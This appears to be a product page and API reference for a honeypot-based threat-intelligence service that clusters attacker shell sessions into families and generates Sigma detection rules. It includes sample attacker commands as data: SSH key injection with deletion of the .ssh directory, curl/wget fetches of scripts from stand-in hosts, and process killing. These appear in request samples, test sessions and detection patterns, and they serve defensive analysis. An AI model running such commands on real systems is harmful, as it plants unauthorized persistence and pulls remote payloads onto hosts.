NullRoute Behavioral Genome

Live Attacker DNA.
Not IOCs. Behavior.

IOCs rotate in minutes. Behavior persists for months.

The NullRoute Behavioral Genome is a continuously updated, machine-readable catalog of real post-compromise attacker behavior - captured across a live multi-node honeypot network, classified by what attackers do, not who they are.

Live counters: Sessions Analyzed · Families · Behavioral Genes · Nodes · 4 Countries · Last Updated

Architecture

Behavioral classification, from first principles

Most threat intelligence answers: who attacked you? We answer: what did they do? The Behavioral Genome decomposes each attacker session into atomic behavioral units - genes - and clusters them into families with shared evolutionary lineage.

Behavioral Atoms

Each command maps to a normalized behavioral atom such as disable_immutable_ssh, download_remote or kill_process; the vocabulary spans 50+ atoms across 4 protocol surfaces.

Gene Detection

Atom sequences are matched against 13 functional gene patterns. A gene is a behavioral module with a purpose, such as ssh_persistence, competitor_cleanup or payload_deploy.

Family Classification

Sessions whose gene sets have Jaccard similarity > 0.6 are grouped into families. Taxonomic hierarchy: Kingdom → Phylum → Family → Variant.
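The atom → gene → family pipeline described above, as an added example that is not NullRoute's code: a small regex atom table, gene detection by atom membership, and single-linkage grouping of sessions whose gene sets exceed the page's Jaccard > 0.6 cutoff. The regexes, gene patterns, sample sessions (TEST-NET hosts) and the inject_ssh_key atom are constructed assumptions, not the genome's real tables.

```python
import re
from itertools import combinations
# Constructed atom table (regex -> atom); the page names all but inject_ssh_key.
ATOM_PATTERNS = [
    (r"^chattr\s+-ia\s+\.ssh", "disable_immutable_ssh"),
    (r"^rm\s+-rf\s+\.ssh", "destroy_ssh_dir"),
    (r">>\s*\.ssh/authorized_keys", "inject_ssh_key"),
    (r"^(wget|curl)\s+https?://", "download_remote"),
    (r"^(pkill|kill)\b", "kill_process"),
]
# Constructed gene patterns: a gene fires when all of its atoms are present.
GENE_PATTERNS = {
    "ssh_persistence": {"disable_immutable_ssh", "destroy_ssh_dir", "inject_ssh_key"},
    "payload_deploy": {"download_remote"},
    "competitor_cleanup": {"kill_process"},
}
# Constructed sessions modelled on the page's /match example (TEST-NET hosts).
SESSIONS = [
    ["chattr -ia .ssh", "rm -rf .ssh && mkdir .ssh",
     "echo 'ssh-rsa AAAA...' >> .ssh/authorized_keys", "curl http://203.0.113.5/x.sh"],
    ["chattr -ia .ssh", "rm -rf .ssh", "echo 'ssh-rsa BBBB...' >> .ssh/authorized_keys",
     "wget http://203.0.113.9/y.sh", "pkill -9 competitor"],
    ["wget http://203.0.113.9/y.sh", "chmod +x y.sh"],
]

def commands_to_atoms(commands):
    atoms = []  # each raw command normalizes to the first atom whose pattern matches
    for cmd in commands:
        for pattern, atom in ATOM_PATTERNS:
            if re.search(pattern, cmd.strip()):
                atoms.append(atom)
                break
    return atoms

def detect_genes(atoms):
    return {g for g, req in GENE_PATTERNS.items() if req <= set(atoms)}

def jaccard(a, b):
    return len(a & b) / len(a | b) if a or b else 0.0

def cluster_families(sessions, threshold=0.6):
    """Single-linkage grouping over gene sets with Jaccard > threshold."""
    genes = [detect_genes(commands_to_atoms(s)) for s in sessions]
    parent = list(range(len(sessions)))
    find = lambda i: i if parent[i] == i else find(parent[i])
    for i, j in combinations(range(len(sessions)), 2):
        if jaccard(genes[i], genes[j]) > threshold:
            parent[find(i)] = find(j)
    roots = [find(i) for i in range(len(sessions))]
    return sorted([i for i in range(len(sessions)) if roots[i] == r] for r in set(roots))
```

With the constructed sessions, the first two share two of three genes (Jaccard 0.667) and land in one family, while the download-only session (Jaccard 0.5 at best) stays separate; lowering the threshold to 0.4 merges all three.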

Auto-Generated Detection

Every family produces a valid Sigma rule, auto-generated from its canonical variant's behavioral atom sequence. Ready for sigma-cli conversion to Splunk, Elastic, Sentinel, and 30+ other targets.

Known Families

Classified attacker families

Active families observed across the honeypot network; a marked family is one whose behavioral signature is currently evolving.

Family table columns: Family, Phylum, Sessions, Nodes, Last Seen.
Temporal Evolution

Behavioral genome drift

Each dot is a distinct behavioral variant; size reflects session volume. Glowing dots were active in the last 30 days; pulsing dots emerged in the last 7 days.

Live Demo

Match commands against the genome

Submit shell commands observed in a suspicious session (one per line). The genome returns the best-matching attacker family with confidence score, matched behavioral atoms, and MITRE ATT&CK techniques.

Do not submit real credentials, SSH keys, or sensitive data. Use obfuscated examples only.
Public API

Machine-readable. No key required.

All Genome API endpoints are public and free for research use. Base URL: https://nullroute.live/api/v1/genome

GET /api/v1/genome/stats - Global genome statistics

Returns overall coverage: session count, family count, gene count, node distribution, last analysis timestamp.

// GET /api/v1/genome/stats
{
  "total_sessions_analyzed": 4940,
  "family_count": 8,
  "gene_count": 13,
  "phylum_distribution": { "worm": 2, "botnet": 1, ... },
  "last_analysis": "2026-04-03T08:50:10Z"
}
GET /api/v1/genome/families - List all known families · filters: ?phylum=worm · ?node=node3-fr

Returns all classified attacker families. Filterable by phylum (worm, botnet, miner, stealer, scanner, operator) or by node.

// GET /api/v1/genome/families?phylum=worm
{
  "families": [{
    "family_id": "130df9da",
    "name": "dota_mdrfckr",
    "phylum": "worm",
    "total_sessions": 1969,
    "nodes_observed": ["node1-de", "node2-us", "node3-fr", "node4-sg"]
  }, ...]
}
GET /api/v1/genome/families/{id} - Full family detail: variants, genes, MITRE mapping

Complete family profile including all variants, gene membership with ATT&CK technique mapping, and link to auto-generated Sigma rule.

// GET /api/v1/genome/families/130df9da
{
  "name": "dota_mdrfckr",
  "genes": [{
    "gene_id": "ssh_persistence",
    "attack_mappings": [{
      "technique_id": "T1098.004",
      "tactic": "persistence"
    }]
  }, ...],
  "sigma_url": "/api/v1/genome/sigma/130df9da"
}
GET /api/v1/genome/families/{id}/timeline - Temporal variant emergence: evolution score, is_active, is_emerging

Returns the emergence timeline for all variants of a family, sorted by first observation. Includes evolution_score (0–1), active vs. total variant count, days since last activity, and per-variant is_active / is_emerging flags.

// GET /api/v1/genome/families/130df9da/timeline
{
  "name": "dota_mdrfckr",
  "total_variants": 35,
  "active_variants": 35,
  "emerging_variants": 35,
  "evolution_score": 1.0,
  "is_active": true,
  "days_since_last_activity": 2,
  "timeline": [
    { "variant_id": "130df9da...", "first_seen": "2026-03-14",
      "session_count": 1060, "kill_chain_max": "persist",
      "is_active": true, "is_emerging": true }
  ]
}
POST /api/v1/genome/match - Match a command sequence to known families

Submit a list of shell commands. Returns ranked family matches with confidence scores, matched behavioral atoms, novel atoms not in any known family, and MITRE techniques.

// POST /api/v1/genome/match
{
  "commands": [
    "chattr -ia .ssh",
    "rm -rf .ssh && mkdir .ssh",
    "echo 'ssh-rsa ...' >> .ssh/authorized_keys"
  ],
  "top_k": 3
}

// Response
{
  "matches": [{
    "name": "dota_mdrfckr",
    "confidence": 0.857,
    "matched_atoms": ["disable_immutable_ssh", "destroy_ssh_dir", ...],
    "mitre_techniques": [{ "id": "T1098.004", ... }]
  }]
}
GET /api/v1/genome/sigma/{id} - Auto-generated Sigma detection rule (YAML)

Returns valid Sigma YAML for the specified family, auto-generated from its canonical variant's behavioral atom sequence. Ready for sigma-cli conversion to Splunk, Elastic, Sentinel, QRadar.

# GET /api/v1/genome/sigma/130df9da
title: 'dota_mdrfckr - NullRoute Behavioral Genome (NBG-130df9da)'
status: experimental
logsource:
  category: process_creation
  product: linux
detection:
  sel_disable_immutable_s:
    CommandLine|contains:
      - 'chattr -ia .ssh'
  condition: ...
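How a family's canonical atom sequence becomes a Sigma rule in the layout of the sample above (and of the Auto-Generated Detection step in the Architecture section), as an added example rather than NullRoute's own generator. The atom-to-command-fragment table and the `1 of sel_*` condition are assumptions; the page elides its own condition.

```python
# Constructed atom -> command-fragment table standing in for the genome's own.
ATOM_COMMANDS = {
    "disable_immutable_ssh": ["chattr -ia .ssh"],
    "destroy_ssh_dir": ["rm -rf .ssh"],
    "inject_ssh_key": [">> .ssh/authorized_keys"],
    "download_remote": ["wget http://", "curl http://"],
}

def yaml_str(s):
    """Single-quoted YAML scalar; a literal ' inside is doubled."""
    return "'" + s.replace("'", "''") + "'"

def family_to_sigma(family_id, name, atoms):
    """Build the rule as a dict in the layout of the page's sample rule."""
    detection = {}
    for atom in atoms:
        fragments = ATOM_COMMANDS.get(atom)
        if fragments:  # atoms with no command-line signature cannot be matched here
            # selection names are truncated to 19 atom characters, as on the page
            detection[f"sel_{atom[:19]}"] = {"CommandLine|contains": fragments}
    if not detection:
        raise ValueError("no atom in this family has a command-line signature")
    # Each process_creation event is one process, so joining the selections
    # with AND would never fire; any single atom is a hit (assumed condition).
    detection["condition"] = "1 of sel_*"
    return {
        "title": yaml_str(f"{name} - NullRoute Behavioral Genome (NBG-{family_id})"),
        "status": "experimental",
        "logsource": {"category": "process_creation", "product": "linux"},
        "detection": detection,
    }

def to_yaml(obj, indent=0):
    """Minimal emitter for the nested dict/list/str shape used above."""
    pad = "  " * indent
    lines = []
    for key, value in obj.items():
        if isinstance(value, dict):
            lines.append(f"{pad}{key}:")
            lines.extend(to_yaml(value, indent + 1))
        elif isinstance(value, list):
            lines.append(f"{pad}{key}:")
            lines.extend(f"{pad}  - {yaml_str(v)}" for v in value)
        else:
            lines.append(f"{pad}{key}: {value}")
    return lines

def render_rule(family_id, name, atoms):
    return "\n".join(to_yaml(family_to_sigma(family_id, name, atoms))) + "\n"
```

Because the rule fires on any one atom, per-atom hits from the SIEM need correlating by host and session window to recover the family-level signal that the genome's Jaccard grouping works with.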